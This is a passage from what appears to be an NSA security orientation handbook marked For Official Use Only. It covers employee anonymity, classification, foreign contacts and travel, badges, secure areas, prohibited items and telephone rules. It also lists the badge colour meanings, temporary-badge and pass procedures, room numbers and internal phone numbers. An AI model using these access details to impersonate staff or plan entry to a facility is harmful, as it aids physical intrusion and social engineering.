protection. The specific nature of this protection is set forth in various Agency security regulations and directives. The total NSA Security Program, however, extends beyond these regulations. It is based upon the concept that security begins as a state of mind. The program is designed to develop an appreciation of the need to protect information vital to the national defense, and to foster the development of a level of awareness which will make security more than routine compliance with regulations. At times, security practices and procedures cause personal inconvenience. They take time and effort and on occasion may make it necessary for you to voluntarily forego some of your usual personal perogatives. But your compensation for the inconvenience is the knowledge that the work you are accomplishing at NSA, within a framework of sound security practices, contributes significantly to the defense and continued security of the United States of America. I extend to you my very best wishes as you enter upon your chosen career or assignment with NSA. Philip T. Pease Director of Security INITIAL SECURITY RESPONSIBILITIES Anonymity Perhaps one of the first security practices with which new NSA personnel should become acquainted is the practice of anonymity. In an open society such as ours, this practice is necessary because information which is generally available to the public is available also to hostile intelligence. Therefore, the Agency mission is best accomplished apart from public attention. Basically, anonymity means that NSA personnel are encouraged not to draw attention to themselves nor to their association with this Agency. NSA personnel are also cautioned neither to confirm nor deny any specific questions about NSA activities directed to them by individuals not affiliated with the Agency. The ramifications of the practice of anonymity are rather far reaching, and its success depends on the cooperation of all Agency personnel. Described below you will find some examples of situations that you may encounter concerning your employment and how you should cope with them. Beyond the situations cited, your judgement and discretion will become the deciding factors in how you respond to questions about your employment. Answering Questions About Your Employment Certainly, you may tell your family and friends that you are employed at or assigned to the National Security Agency. There is no valid reason to deny them this information. However, you may not disclose to them any information concerning specific aspects of the Agency's mission, activities, and organization. You should also ask them not to publicize your association with NSA. Should strangers or casual acquaintances question you about your place of employment, an appropriate reply would be that you work for the Department of Defense. If questioned further as to where you are employed within the Department of Defense, you may reply, "NSA." When you inform someone that you work for NSA (or the Department of Defense) you may expect that the next question will be, "What do you do?" It is a good idea to anticipate this question and to formulate an appropriate answer. Do not act mysteriously about your employment, as that would only succeed in drawing more attention to yourself. If you are employed as a secretary, engineer, computer scientist, or in a clerical, administrative, technical, or other capacity identifiable by a general title which in no way indicates how your talents are being applied to the mission of the Agency, it is suggested that you state this general title. If you are employed as a linguist, you may say that you are a linguist, if necessary. However, you should not indicate the specific language(s) with which you are involved. The use of service specialty titles which tend to suggest or reveal the nature of the Agency's mission or specific aspects of their work. These professional titles, such as cryptanalyst, signals collection officer, and intelligence research analyst, if given verbatim to an outsider, would likely generate further questions which may touch upon the classified aspects of your work. Therefore, in conversation with outsiders, it is suggested that such job titles be generalized. For example, you might indicate that you are a "research analyst." You may not, however, discuss the specific nature of your analytic work. Answering Questions About Your Agency Training During your career or assignment at NSA, there is a good chance that you will receive some type of job-related training. In many instances the nature of the training is not classified. However, in some situations the specialized training you receive will relate directly to sensitive Agency functions. In such cases, the nature of this training may not be discussed with persons outside of this Agency. If your training at the Agency includes language training, your explanation for the source of your linguistic knowledge should be that you obtained it while working for the Department of Defense. You Should not draw undue attention to your language abilities, and you may not discuss how you apply your language skill at the Agency. If you are considering part-time employment which requires the use of language or technical skills similar to those required for the performance of your NSA assigned duties, you must report (in advance) the anticipated part-time work through your Staff Security Officer (SSO) to the Office of Security's Clearance Division (M55). Verifying Your Employment On occasion, personnel must provide information concerning their employment to credit institutions in connection with various types of applications for credit. In such situations you may state, if you are a civilian employee, that you are employed by NSA and indicate your pay grade or salary. Once again, generalize your job title. If any further information is desired by persons or firms with whom you may be dealing, instruct them to request such information by correspondence addressed to: Director of Civilian Personnel, National Security Agency, Fort George G. Meade, Maryland 20755-6000. Military personnel should use their support group designator and address when indicating their current assignment. If you contemplate leaving NSA for employment elsewhere, you may be required to submit a resume/job application, or to participate in extensive employment interviews. In such circumstances, you should have your resume reviewed by the Classification Advisory Officer (CAO) assigned to your organization. Your CAO will ensure that any classified operational details of your duties have been excluded and will provide you with an unclassified job description. Should you leave the Agency before preparing such a resume, you may develop one and send it by registered mail to the NSA/CSS Information Policy Division (Q43) for review. Remember, your obligation to protect sensitive Agency information extends beyond your employment at NSA. The Agency And Public News Media >From time to time you may find that the agency is the topic of reports or articles appearing in public news media--newspapers, magazines, books, radio and TV. The NSA/CSS Information Policy Division (Q43) represents the Agency in matters involving the press and other media. This office serves at the Agency's official media center and is the Director's liaison office for public relations, both in the community and with other government agencies. The Information Policy Division must approve the release of all information for and about NSA, its mission, activities, and personnel. In order to protect the aspects of Agency operations, NSA personnel must refrain from either confirming or denying any information concerning the Agency or its activities which may appear in the public media. If you are asked about the activities of NSA, the best response is "no comment." You should the notify Q43 of the attempted inquiry. For the most part, public references to NSA are based upon educated guesses. The Agency does not normally make a practice of issuing public statements about its activities. GENERAL RESPONSIBILITIES Espionage And Terrorism During your security indoctrination and throughout your NSA career you will become increasingly aware of the espionage and terrorist threat to the United States. Your vigilance is the best single defense in protecting NSA information, operations, facilities and people. Any information that comes to your attention that suggests to you the existence of, or potential for, espionage or terrorism against the U.S. or its allies must be promptly reported by you to the Office of Security. There should be no doubt in your mind about the reality of the threats. You are now affiliated with the most sensitive agency in government and are expected to exercise vigilance and common sense to protect NSA against these threats. Classification Originators of correspondence, communications, equipment, or documents within the Agency are responsible for ensuring that the proper classification, downgrading information and, when appropriate, proper caveat notations are assigned to such material. (This includes any handwritten notes which contain classified information). The three levels of classification are Confidential, Secret and Top Secret. The NSA Classification Manual should be used as guidance in determining proper classification. If after review of this document you need assistance, contact the Classification Advisory Officer (CAO) assigned to your organization, or the Information Policy Division (Q43). Need-To-Know Classified information is disseminated only on a strict "need-to-know" basis. The "need-to-know" policy means that classified information will be disseminated only to those individuals who, in addition to possessing a proper clearance, have a requirement to know this information in order to perform their official duties (need-to-know). No person is entitled to classified information solely by virtue of office, position, rank, or security clearance. All NSA personnel have the responsibility to assert the "need-to-know" policy as part of their responsibility to protect sensitive information. Determination of "need-to-know" is a supervisory responsibility. This means that if there is any doubt in your mind as to an individual's "need-to-know," you should always check with your supervisor before releasing any classified material under your control. For Official Use Only Separate from classified information is information or material marked "FOR OFFICIAL USE ONLY" (such as this handbook). This designation is used to identify that official information or material which, although unclassified, is exempt from the requirement for public disclosure of information concerning government activities and which, for a significant reason, should not be given general circulation. Each holder of "FOR OFFICAL USE ONLY" (FOUO) information or material is authorized to disclose such information or material to persons in other departments or agencies of the Executive and Judicial branches when it is determined that the information or material is required to carry our a government function. The recipient must be advised that the information or material is not to be disclosed to the general public. Material which bears the "FOR OFFICIAL USE ONLY" caveat does not come under the regulations governing the protection of classified information. The unauthorized disclosure of information marked "FOR OFFICIAL USE ONLY" does not constitute an unauthorized disclosure of classified defense information. However, Department of Defense and NSA regulations prohibit the unauthorized disclosure of information designated "FOR OFFICIAL USE ONLY." Appropriate administrative action will be taken to determine responsibility and to apply corrective and/or disciplinary measures in cases of unauthorized disclosure of information which bears the "FOR OFFICIAL USE ONLY" caveat. Reasonable care must be exercised in limiting the dissemination of "FOR OFFICIAL USE ONLY" information. While you may take this handbook home for further study, remember that is does contain "FOR OFFICIAL USE ONLY" information which should be protected. Prepublication Review All NSA personnel (employees, military assignees, and contractors) must submit for review any planned articles, books, speeches, resumes, or public statements that may contain classified, classifiable, NSA-derived, or unclassified protected information, e.g., information relating to the organization, mission, functions, or activities of NSA. Your obligation to protect this sensitive information is a lifetime one. Even when you resign, retire, or otherwise end your affiliation with NSA, you must submit this type of material for prepublication review. For additional details, contact the Information Policy Division (Q43) for an explanation of prepublication review procedures. Personnel Security Responsibilities Perhaps you an recall your initial impression upon entering an NSA facility. Like most people, you probably noticed the elaborate physical security safeguards--fences, concrete barriers, Security Protective Officers, identification badges, etc. While these measures provide a substantial degree of protection for the information housed within our buildings, they represent only a portion of the overall Agency security program. In fact, vast amounts of information leave our facilities daily in the minds of NSA personnel, and this is where our greatest vulnerability lies. Experience has indicated that because of the vital information we work with at NSA, Agency personnel may become potential targets for hostile intelligence efforts. Special safeguards are therefore necessary to protect our personnel. Accordingly, the Agency has an extensive personnel security program which establishes internal policies and guidelines governing employee conduct and activities. These policies cover a variety of topics, all of which are designed to protect both you and the sensitive information you will gain through your work at NSA. Association With Foreign Nationals As a member of the U.S. Intelligence Community and by virtue of your access to sensitive information, you are a potential target for hostile intelligence activities carried out by or on behalf of citizens of foreign countries. A policy concerning association with foreign nationals has been established by the Agency to minimize the likelihood that its personnel might become subject to undue influence or duress or targets of hostile activities through foreign relationships. As an NSA affiliate, you are prohibited from initiating or maintaining associations (regardless of the nature and degree) with citizens or officials of communist-controlled, or other countries which pose a significant threat to the security of the United States and its interests. A comprehensive list of these designated countries is available from your Staff Security Officer or the Security Awareness Division. Any contact with citizens of these countries, no matter how brief or seemingly innocuous, must be reported as soon as possible to your Staff Security Officer (SSO). (Individuals designated as Staff Security Officers are assigned to every organization; a listing of Staff Security Officers can be found at the back of this handbook). Additionally, close and continuing associations with any non-U.S. citizens which are characterized by ties of kinship, obligation, or affection are prohibited. A waiver to this policy may be granted only under the most exceptional circumstances when there is a truly compelling need for an individual's services or skills and the security risk is negligible. In particular, a waiver must be granted in advance of a marriage to or cohabitation with a foreign national in order to retain one's access to NSA information. Accordingly, any intent to cohabitate with or marry a non-U.S. citizen must be reported immediately to your Staff Security Officer. If a waiver is granted, future reassignments both at headquarters and overseas may be affected. The marriage or intended marriage of an immediate family member (parents, siblings, children) to a foreign national must also be reported through your SSO to the Clearance Division (M55). Casual social associations with foreign nationals (other than those of the designated countries mentioned above) which arise from normal living and working arrangements in the community usually do not have to be reported. During the course of these casual social associations, you are encouraged to extend the usual social amenities. Do not act mysteriously or draw attention to yourself (and possibly to NSA) by displaying an unusually wary attitude. Naturally, your affiliation with the Agency and the nature of your work should not be discussed. Again, you should be careful not to allow these associations to become close and continuing to the extent that they are characterized by ties of kinship, obligation, or affection. If at any time you feel that a "casual" association is in any way suspicious, you should report this to your Staff Security Officer immediately. Whenever any doubt exists as to whether or not a situation should be reported or made a matter of record, you should decided in favor of reporting it. In this way, the situation can be evaluated on its own merits, and you can be advised as to your future course of action. Correspondence With Foreign Nationals NSA personnel are discouraged from initiating correspondence with individuals who are citizens of foreign countries. Correspondence with citizens of communist-controlled or other designated countries is prohibited. Casual social correspondence, including the "penpal" variety, with other foreign acquaintances is acceptable and need not be reported. If, however, this correspondence should escalate in its frequency or nature, you should report that through your Staff Security Officer to the Clearance Division (M55). Embassy Visits Since a significant percentage of all espionage activity is known to be conducted through foreign embassies, consulates, etc., Agency policy discourages visits to embassies, consulates or other official establishments of a foreign government. Each case, however, must be judged on the circumstances involved. Therefore, if you plan to visit a foreign embassy for any reason (even to obtain a visa), you must consult with, and obtain the prior approval of, your immediate supervisor and the Security Awareness Division (M56). Amateur Radio Activities Amateur radio (ham radio) activities are known to be exploited by hostile intelligence services to identify individuals with access to classified information; therefore, all licensed operators are expected to be familiar with NSA/CSS Regulation 100-1, "Operation of Amateur Radio Stations" (23 October 1986). The specific limitations on contacts with operators from communist and designated countries are of particular importance. If you are an amateur radio operator you should advise the Security Awareness Division (M56) of your amateur radio activities so that detailed guidance may be furnished to you. Unofficial Foreign Travel In order to further protect sensitive information from possible compromise resulting from terrorism, coercion, interrogation or capture of Agency personnel by hostile nations and/or terrorist groups, the Agency has established certain policies and procedures concerning unofficial foreign travel. All Agency personnel (civilian employees, military assignees, and contractors) who are planning unofficial foreign travel must have that travel approved by submitting a proposed itinerary to the Security Awareness Division (M56) at least 30 working days prior to their planned departure from the United States. Your itinerary should be submitted on Form K2579 (Unofficial Foreign Travel Request). This form provides space for noting the countries to be visited, mode of travel, and dates of departure and return. Your immediate supervisor must sign this form to indicate whether or not your proposed travel poses a risk to the sensitive information, activities, or projects of which you may have knowledge due to your current assignment. After your supervisor's assessment is made, this form should be forwarded to the Security Awareness Director (M56). Your itinerary will then be reviewed in light of the existing situation in the country or countries to be visited, and a decision for approval or disapproval will be based on this assessment. The purpose of this policy is to limit the risk of travel to areas of the world where a threat may exist to you and to your knowledge of classified Agency activities. In this context, travel to communist-controlled and other hazardous activity areas is prohibited. A listing of these hazardous activity areas is prohibited. A listing of these hazardous activity areas can be found in Annex A of NSA/CSS Regulation No. 30-31, "Security Requirements for Foreign Travel" (12 June 1987). From time to time, travel may also be prohibited to certain areas where the threat from hostile intelligence services, terrorism, criminal activity or insurgency poses an unacceptable risk to Agency employees and to the sensitive information they possess. Advance travel deposits made without prior agency approval of the proposed travel may result in financial losses by the employee should the travel be disapproved, so it is important to obtain approval prior to committing yourself financially. Questions regarding which areas of the world currently pose a threat should be directed to the Security Awareness Division (M56). Unofficial foreign travel to Canada, the Bahamas, Bermuda, and Mexico does not require prior approval, however, this travel must still be reported using Form K2579. Travel to these areas may be reported after the fact. While you do not have to report your foreign travel once you have ended your affiliation with the Agency, you should be aware that the risk incurred in travelling to certain areas, from a personal safety and/or counterintelligence standpoint, remains high. The requirement to protect the classified information to which you have had access is a lifetime obligation. Membership In Organizations Within the United States there are numerous organizations with memberships ranging from a few to tens of thousands. While you may certainly participate in the activities of any reputable organization, membership in any international club or professional organization/activity with foreign members should be reported through your Staff Security Officer to the Clearance Division (M55). In most cases there are no security concerns or threats to our employees or affiliates. However, the Office of Security needs the opportunity to research the organization and to assess any possible risk to you and the information to which you have access. In addition to exercising prudence in your choice of organizational affiliations, you should endeavor to avoid participation in public activities of a conspicuously controversial nature because such activities could focus undesirable attention upon you and the Agency. NSA employees may, however, participate in bona fide public affairs such as local politics, so long as such activities do not violate the provisions of the statutes and regulations which govern the political activities of all federal employees. Additional information may be obtained from your Personnel Representative. Changes In Marital Status/Cohabitation/Names All personnel, either employed by or assigned to NSA, must advise the Office of Security of any changes in their marital status (either marriage or divorce), cohabitation arrangements, or legal name changes. Such changes should be reported by completing NSA Form G1982 (Report of Marriage/Marital Status Change/Name Change), and following the instructions printed on the form. Use And Abuse Of Drugs It is the policy of the National Security Agency to prevent and eliminate the improper use of drugs by Agency employees and other personnel associated with the Agency. The term "drugs" includes all controlled drugs or substances identified and listed in the Controlled Substances Act of 1970, as amended, which includes but is not limited to: narcotics, depressants, stimulants, cocaine, hallucinogens ad cannabis (marijuana, hashish, and hashish oil). The use of illegal drugs or the abuse of prescription drugs by persons employed by, assigned or detailed to the Agency may adversely affect the national security; may have a serious damaging effect on the safety and the safety of others; and may lead to criminal prosecution. Such use of drugs either within or outside Agency controlled facilities is prohibited. Physical Security Policies The physical security program at NSA provides protection for classified material and operations and ensures that only persons authorized access to the Agency's spaces and classified material are permitted such access. This program is concerned not only with the Agency's physical plant and facilities, but also with the internal and external procedures for safeguarding the Agency's classified material and activities. Therefore, physical security safeguards include Security Protective Officers, fences, concrete barriers, access control points, identification badges, safes, and the compartmentalization of physical spaces. While any one of these safeguards represents only a delay factor against attempts to gain unauthorized access to NSA spaces and material, the total combination of all these safeguards represents a formidable barrier against physical penetration of NSA. Working together with personnel security policies, they provide "security in depth." The physical security program depends on interlocking procedures. The responsibility for carrying out many of these procedures rests with the individual. This means you, and every person employed by, assign, or detailed to the Agency, must assume the responsibility for protecting classified material. Included in your responsibilities are: challenging visitors in operational areas; determining "need-to-know;" limiting classified conversations to approved areas; following established locking and checking procedures; properly using the secure and non-secure telephone systems; correctly wrapping and packaging classified data for transmittal; and placing classified waste in burn bags. The NSA Badge Even before you enter an NSA facility, you have a constant reminder of security--the NSA badge. Every person who enters an NSA installation is required to wear an authorized badge. To enter most NSA facilities your badge must be inserted into an Access Control Terminal at a building entrance and you must enter your Personal Identification Number (PIN) on the terminal keyboard. In the absence of an Access Control Terminal, or when passing an internal security checkpoint, the badge should be held up for viewing by a Security Protective Officer. The badge must be displayed at all times while the individual remains within any NSA installation. NSA Badges must be clipped to a beaded neck chain. If necessary for the safety of those working in the area of electrical equipment or machinery, rubber tubing may be used to insulate the badge chain. For those Agency personnel working in proximity to other machinery or equipment, the clip may be used to attach the badge to the wearer's clothing, but it must also remain attached to the chain. After you leave an NSA installation, remove your badge from public view, thus avoiding publicizing your NSA affiliation. Your badge should be kept in a safe place which is convenient enough to ensure that you will be reminded to bring it with you to work. A good rule of thumb is to afford your badge the same protection you give your wallet or your credit cards. DO NOT write your Personal Identification Number on your badge. If you plan to be away from the Agency for a period of more than 30 days, your badge should be left at the main Visitor Control Center which services your facility. Should you lose your badge, you must report the facts and circumstances immediately to the Security Operations Center (SOC) (963-3371s/688-6911b) so that your badge PIN can be deactivated in the Access Control Terminals. In the event that you forget your badge when reporting for duty, you may obtain a "non-retention" Temporary Badge at the main Visitor Control Center which serves your facility after a co-worker personally identifies your and your clearance has been verified. Your badge is to be used as identification only within NSA facilities or other government installations where the NSA badge is recognized. Your badge should never be used outside of the NSA or other government facilities for the purpose of personal identification. You should obtain a Department of Defense identification card from the Civilian Welfare Fund (CWF) if you need to identify yourself as a government employee when applying for "government discounts" offered at various commercial establishments. Your badge color indicates your particular affiliation with NSA and your level of clearance. Listed below are explanations of the badge colors you are most likely to see: Green (*) Fully cleared NSA employees and certain military assignees. Orange (*) (or Gold) Fully cleared representative of other government agencies. Black (*) Fully cleared contractors or consultants. Blue Employees who are cleared to the SECRET level while awaiting completion of their processing for full (TS/SI) clearance. These Limited Interim Clearance (LIC) employees are restricted to certain activities while inside a secure area. Red Clearance level is not specified, so assume the holder is uncleared. * - Fully cleared status means that the person has been cleared to the Top Secret (TS) level and indoctrinated for Special Intelligence (SI). All badges with solid color backgrounds (permanent badges) are kept by individuals until their NSA employment or assignment ends. Striped badges ("non-retention" badges) are generally issued to visitors and are returned to the Security Protective Officer upon departure from an NSA facility. Area Control Within NSA installations there are generally two types of areas, Administrative and Secure. An Administrative Area is one in which storage of classified information is not authorized, and in which discussions of a classified nature are forbidden. This type of area would include the corridors, restrooms, cafeterias, visitor control areas, credit union, barber shop, and drugstore. Since uncleared, non-NSA personnel are often present in these areas, all Agency personnel must ensure that no classified information is discussed in an Administrative Area. Classified information being transported within Agency facilities must be placed within envelopes, folders, briefcases, etc. to ensure that its contents or classification markings are not disclosed to unauthorized persons, or that materials are not inadvertently dropped enroute. The normal operational work spaces within an NSA facility are designated Secure Areas. These areas are approved for classified discussions and for the storage of classified material. Escorts must be provided if it is necessary for uncleared personnel (repairmen, etc.) to enter Secure Areas, an all personnel within the areas must be made aware of the presence of uncleared individuals. All unknown, unescorted visitors to Secure Areas should be immediately challenged by the personnel within the area, regardless of the visitors' clearance level (as indicated by their badge color). The corridor doors of these areas must be locked with a deadbolt and all classified information in the area must be properly secured after normal working hours or whenever the area is unoccupied. When storing classified material, the most sensitive material must be stored in the most secure containers. Deadbolt keys for doors to these areas must be returned to the key desk at the end of the workday. For further information regarding Secure Areas, consult the Physical Security Division (M51) or your staff Security Officer. Items Treated As Classified For purposes of transportation, storage and destruction, there are certain types of items which must be treated as classified even though they may not contain classified information. Such items include carbon paper, vu-graphs, punched machine processing cards, punched paper tape, magnetic tape, computer floppy disks, film, and used typewriter ribbons. This special treatment is necessary since a visual examination does not readily reveal whether the items contain classified information. Prohibited Items Because of the potential security or safety hazards, certain items are prohibited under normal circumstances from being brought into or removed from any NSA installation. These items have been groped into two general classes. Class I prohibited items are those which constitute a threat to the safety and security of NSA/CSS personnel and facilities. Items in this category include: a. Firearms and ammunition b. Explosives, incendiary substances, radioactive materials, highly volatile materials, or other hazardous materials c. Contraband or other illegal substances d. Personally owned photographic or electronic equipment including microcomputers, reproduction or recording devices, televisions or radios. Prescribed electronic medical equipment is normally not prohibited, but requires coordination with the Physical Security Division (M51) prior to being brought into any NSA building. Class II prohibited items are those owned by the government or contractors which constitute a threat to physical, technical, or TEMPEST security. Approval by designated organizational officials is required before these items can be brought into or removed from NSA facilities. Examples are: a. Transmitting and receiving equipment b. Recording equipment and media c. Telephone equipment and attachments d. Computing devices and terminals e. Photographic equipment and film A more detailed listing of examples of Prohibited Items may be obtained from your Staff Security Officer or the Physical Security Division (M51). Additionally, you may realize that other seemingly innocuous items are also restricted and should not be brought into any NSA facility. Some of these items pose a technical threat; others must be treated as restricted since a visual inspection does not readily reveal whether they are classified. These items include: a. Negatives from processed film; slides; vu-graphs b. Magnetic media such as floppy disks, cassette tapes, and VCR videotapes c. Remote control devices for telephone answering machines d. Pagers Exit Inspection As you depart NSA facilities, you will note another physical security safeguard--the inspection of the materials you are carrying. This inspection of your materials, conducted by Security Protective Officers, is designed to preclude the inadvertent removal of classified material. It is limited to any articles that you are carrying out of the facility and may include letters, briefcases, newspapers, notebooks, magazines, gym bags, and other such items. Although this practice may involve some inconvenience, it is conducted in your best interest, as well as being a sound security practice. The inconvenience can be considerably reduced if you keep to a minimum the number of personal articles that you remove from the Agency. Removal Of Material From NSA Spaces The Agency maintains strict controls regarding the removal of material from its installations, particularly in the case of classified material. Only under a very limited and official circumstances classified material be removed from Agency spaces. When deemed necessary, specific authorization is required to permit an individual to hand carry classified material out of an NSA building to another Secure Area. Depending on the material and circumstances involved, there are several ways to accomplish this. A Courier Badge authorizes the wearer, for official purposes, to transport classified material, magnetic media, or Class II prohibited items between NSA facilities. These badges, which are strictly controlled, are made available by the Physical Security Division (M51) only to those offices which have specific requirements justifying their use. An Annual Security Pass may be issued to individuals whose official duties require that they transport printed classified materials, information storage media, or Class II prohibited items to secure locations within the local area. Materials carried by an individual who displays this pass are subject to spot inspection by Security Protective Officers or other personnel from the Office of Security. It is not permissible to use an Annual Security Pass for personal convenience to circumvent inspection of your personal property by perimeter Security Protective Officers. If you do not have access to a Courier Badge and you have not been issued an Annual Security Pass, you may obtain a One-Time Security Pass to remove classified materials/magnetic media or admit or remove prohibited items from an NSA installation. These passes may be obtained from designated personnel in your work element who have been given authority to issue them. The issuing official must also contact the Security Operations Center (SOC) to obtain approval for the admission or removal of a Class I prohibited item. When there is an official need to remove government property which is not magnetic media, or a prohibited or classified item, a One-Time Property Pass is used. This type of pass (which is not a Security Pass) may be obtained from your element custodial property officer. A Property Pass is also to be used when an individual is removing personal property which might be reasonably be mistaken for unclassified Government property. This pass is surrendered to the Security Protective Officer at the post where the material is being removed. Use of this pass does not preclude inspection of the item at the perimeter control point by the Security Protective Officer or Security professionals to ensure that the pass is being used correctly. External Protection Of Classified Information On those occasions when an individual must personally transport classified material between locations outside of NSA facilities, the individual who is acting as the courier must ensure that the material receives adequate protection. Protective measures must include double wrapping and packaging of classified information, keeping the material under constant control, ensuring the presence of a second appropriately cleared person when necessary, and delivering the material to authorized persons only. If you are designated as a courier outside the local area, contact the Security Awareness Division (M56) for your courier briefing. Even more basic than these procedures is the individual security responsibility to confine classified conversations to secure areas. Your home, car pool, and public places are not authorized areas to conduct classified discussions--even if everyone involved in he discussion possesses a proper clearance and "need-to-know." The possibility that a conversation could be overheard by unauthorized persons dictates the need to guard against classified discussions in non-secure areas. Classified information acquired during the course of your career or assignment to NSA may not be mentioned directly, indirectly, or by suggestion in personal diaries, records, or memoirs. Reporting Loss Or Disclosure Of Classified Information The extraordinary sensitivity of the NSA mission requires the prompt reporting of any known, suspected, or possible unauthorized disclosure of classified information, or the discovery that classified information may be lost, or is not being afforded proper protection. Any information coming to your attention concerning the loss or unauthorized disclosure of classified information should be reported immediately to your supervisor, your Staff Security Officer, or the Security Operations Center (SOC). Use Of Secure And Non-Secure Telephones Two separate telephone systems have been installed in NSA facilities for use in the conduct of official Agency business: the secure telephone system (gray telephone) and the outside, non-secure telephone system (black telephone). All NSA personnel must ensure that use of either telephone system does not jeopardize the security of classified information. The secure telephone system is authorized for discussion of classified information. Personnel receiving calls on the secure telephone may assume that the caller is authorized to use the system. However, you must ensure that the caller has a "need-to-know" the information you will be discussing. The outside telephone system is only authorized for unclassified official Agency business calls. The discussion of classified information is not permitted on this system. Do not attempt to use "double-talk" in order to discuss classified information over the non-secure telephone system. In order to guard against the inadvertent transmission of classified information over a non-secure telephone, and individual using the black telephone in an area where classified activities are being conducted must caution other personnel in the area that the non-secure telephone is in use. Likewise, you should avoid using the non-secure telephone in the vicinity of a secure telephone which is also in use. HELPFUL INFORMATION Security Resources In the fulfillment of your security responsibilities, you should be aware that there are many resources available to assist you. If you have any questions or concerns regarding security at NSA or your individual security responsibilities, your supervisor should be consulted. Additionally, Staff Security Officers are appointed to the designated Agency elements to assist these organizations in carrying out their security responsibilities. There is a Staff Security Officer assigned to each organization; their phone numbers are listed at the back of this handbook. Staff Security Officers also provide guidance to and monitor the activities of Security Coordinators and Advisors (individuals who, in addition to their operational duties within their respective elements, assist element supervisors or managers in discharging security responsibilities). Within the Office of Security, the Physical Security Division (M51) will offer you assistance in matters such as access control, security passes, clearance verification, combination locks, keys, identification badges, technical security, and the Security Protective Force. The Security Awareness Division (M56) provides security guidance and briefings regarding unofficial foreign travel, couriers, special access, TDY/PCS, and amateur radio activities. The Industrial and Field Security Division (M52) is available to provide security guidance concerning NSA contractor and field site matters. The Security Operations Center (SOC) is operated by two Security Duty Officers (SDOs), 24 hours a day, 7 days a week. The SDO, representing the Office of Security, provides a complete range of security services to include direct communications with fire and rescue personnel for all Agency area facilities. The SDO is available to handle any physical or personnel problems that may arise, and if necessary, can direct your to the appropriate security office that can assist you. After normal business hours, weekends, and holidays, the SOC is the focal point for all security matters for all Agency personnel and facilities (to include Agency field sites and contractors). The SOC is located in Room 2A0120, OPS 2A building and the phone numbers are 688-6911(b), 963-3371(s). However, keep in mind that you may contact any individual or any division within the Office of Security directly. Do not hesitate to report any information which may affect the security of the Agency's mission, information, facilities or personnel. Security-Related Services In addition to Office of Security resources, there are a number of professional, security-related services available for assistance in answering your questions or providing the services which you require. The Installations and Logistics Organization (L) maintains the system for the collection and destruction of classified waste, and is also responsible for the movement and scheduling of material via NSA couriers and the Defense Courier Service (DCS). Additionally, L monitors the proper addressing, marking, and packaging of classified material being transmitted outside of NSA; maintains records pertaining to receipt and transmission of controlled mail; and issues property passes for the removal of unclassified property. The NSA Office of Medical Services (M7) has a staff of physicians, clinical psychologists and an alcoholism counselor. All are well trained to help individuals help themselves in dealing with their problems. Counseling services, with referrals to private mental health professionals when appropriate, are all available to NSA personnel. Appointments can be obtained by contacting M7 directly. When an individual refers himself/herself, the information discussed in the counseling sessions is regarded as privileged medical information and is retained exclusively in M7 unless it pertains to the national security. Counselling interviews are conducted by the Office of Civilian Personnel (M3) with any civilian employee regarding both on and off-the-job problems. M3 is also available to assist all personnel with the personal problems seriously affecting themselves or members of their families. In cases of serious physical or emotional illness, injury, hospitalization, or other personal emergencies, M3 informs concerned Agency elements and maintains liaison with family members in order to provide possible assistance. Similar counselling services are available to military assignees through Military Personnel (M2). GUIDE TO SECURITY M51 PHYSICAL SECURITY 963-6651s/688-8293b (FMHQ) 968-8101s/859-6411b (FANX) CONFIRM and badges Prohibited Items (963-6611s/688-7411b) Locks, keys, safes and alarms SOC (963-3371s/688-6911b) Security/vehicle passes NSA facility protection and compliance Visitor Control Inspections Red/blue seal areas New Construction Pass Clearances (963-4780s/688-6759b) M52 INDUSTRIAL AND FIELD SECURITY 982-7918s/859-6255b Security at contractor field site facilities Verification of classified mailing addresses for contractor facilities M53 INVESTIGATIONS 982-7914s/859-6464b Personnel Interview Program (PIP) Reinvestigations Military Interview Program (MIP) Special investigations M54 COUNTERINTELLIGENCE 982-7832s/859-6424b Security counterintelligence analysis Security compromises M55 CLEARANCES 982-7900s/859-4747b Privacy Act Officer (For review of security files) Continued SCI access Contractor/applicant processing Military access M56 SECURITY AWARENESS 963-3273s/688-6535b Security indoctrinations/debriefings Embassy visits Associations with foreign nationals Briefings (foreign travel, Security Week ham radio, courier, Security posters, brochures, etc. LIC, PCS, TDY, special access, etc.) Foreign travel approval Military contractor orientation Special Access Office (963-5466s/688-6353b) M57 POLYGRAPH 982-7844s/859-6363b Polygraph interviews M509 MANAGEMENT AND POLICY STAFF 982-7885s/859-6350b STAFF SECURITY OFFICERS (SSOs) Element Room Secure/Non-Secure A 2A0852B 963-4650/688-7044 B 3W099 963-4559/688-7141 D/Q/J/N/U 2B8066G 963-4496/688-6614 E/M D3B17 968-8050/859-6669 G 9A195 963-5033/688-7902 K 2B5136 963-1978/688-5052 L SAB4 977-7230/688-6194 P 2W091 963-5302/688-7303 R B6B710 968-4073/859-4736 S/V/Y/C/X C2A55 972-2144/688-7549 T 2B5040 963-4543/688-7364 W 1C181 963-5970/688-7061 GUIDE TO SECURITY-RELATED SERVICES Agency Anonymity 968-8251/859-4381 Alcohol Rehabilitation Program 963-5420/688-7312 Cipher Lock Repair 963-1221/688-7119 Courier Schedules (local) 977-7197/688-7403 Defense Courier Service 977-7117/688-7826 Disposal of Classified Waste - Paper only 972-2150/688-6593 - Plastics, Metal, Film, etc 963-4103/688-7062 Locksmith 963-3585/688-7233 Mail Dissemination and Packaging 977-7117/688-7826 Medical Center (Fort Meade) 963-5429/688-7263 (FANX) 968-8960/859-6667 (Airport Square) 982-7800/859-6155 NSA/CSS Information Policy Division 963-5825/688-6527 Personnel Assistance - Civilian 982-7835/859-6577 - Air Force 963-3239/688-7980 - Army 963-3739/688-6393 - Navy 963-3439/688-7325 Property Passes (unclassified material) 977-7263/688-7800 Psychological Services 963-5429/688-7311 FREQUENTLY USED ACRONYMS/DESIGNATORS ARFCOS Armed Forces Courier Service (now known as DCS) AWOL Absent Without Leave CAO Classification Advisory Officer COB Close of Business CWF Civilian Welfare Fund DCS Defense Courier Service (formerly known as ARFCOS) DoD Department of Defense EOD Enter on Duty FOUO For Official Use Only M2 Office of Military Personnel M3 Office of Civilian Personnel M5 Office of Security M7 Office of Medical Services NCS National Cryptologic School PCS Permanent Change of Station PIN Personal Identification Number Q43 Information Policy Division SDO Security Duty Officer SOC Security Operations Center SPO Security Protective Officer SSO Staff Security Officer TDY Temporary Duty UFT Unofficial Foreign Travel A FINAL NOTE The information you have just read is designed to serve as a guide to assist you in the conduct of your security responsibilities. However, it by no means describes the extent of your obligation to protect information vital to the defense of our nation. Your knowledge of specific security regulations is part of a continuing process of education and experience. This handbook is designed to provide he foundation of this knowledge and serve as a guide to the development of an attitude of security awareness. In the final analysis, security is an individual responsibility. As a participant in the activities of the National Security 